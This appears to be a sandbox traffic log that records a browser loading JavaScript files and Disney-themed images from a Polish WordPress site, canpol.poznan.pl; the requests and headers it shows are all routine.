Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/isotope.min.js?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/touchswipe.min.js?ver=1.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/midnight.js?ver=1.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/superfish.js?ver=1.4.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/init.js?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/magnific.js?ver=7.0.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/tweenmax.min.js?ver=1.18.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/touchswipe.min.js?ver=1.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/vivus.min.js?ver=6.0.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/isotope.min.js?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/comment-reply.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/superfish.js?ver=1.4.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/midnight.js?ver=1.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/caroufredsel.min.js?ver=7.0.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/init.js?ver=7.6 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.16 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/vivus.min.js?ver=6.0.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/comment-reply.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/Disney3.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/themes/salient/js/tweenmax.min.js?ver=1.18.0 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/StarWars.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=4.12.1 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_zootropolis.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_winnie_the_pooh.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_sofia_the_first.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_fairs.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_descendans.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.16 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_cars.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/Disney3.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=5.8 HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/StarWars.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_captain_jackie.png HTTP/1.1Host: canpol.poznan.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canpol.poznan.pl/en/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2015/07/disney_zootropolis.png HTTP/1.1Host: canpol.poznan.plConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pll_language=en
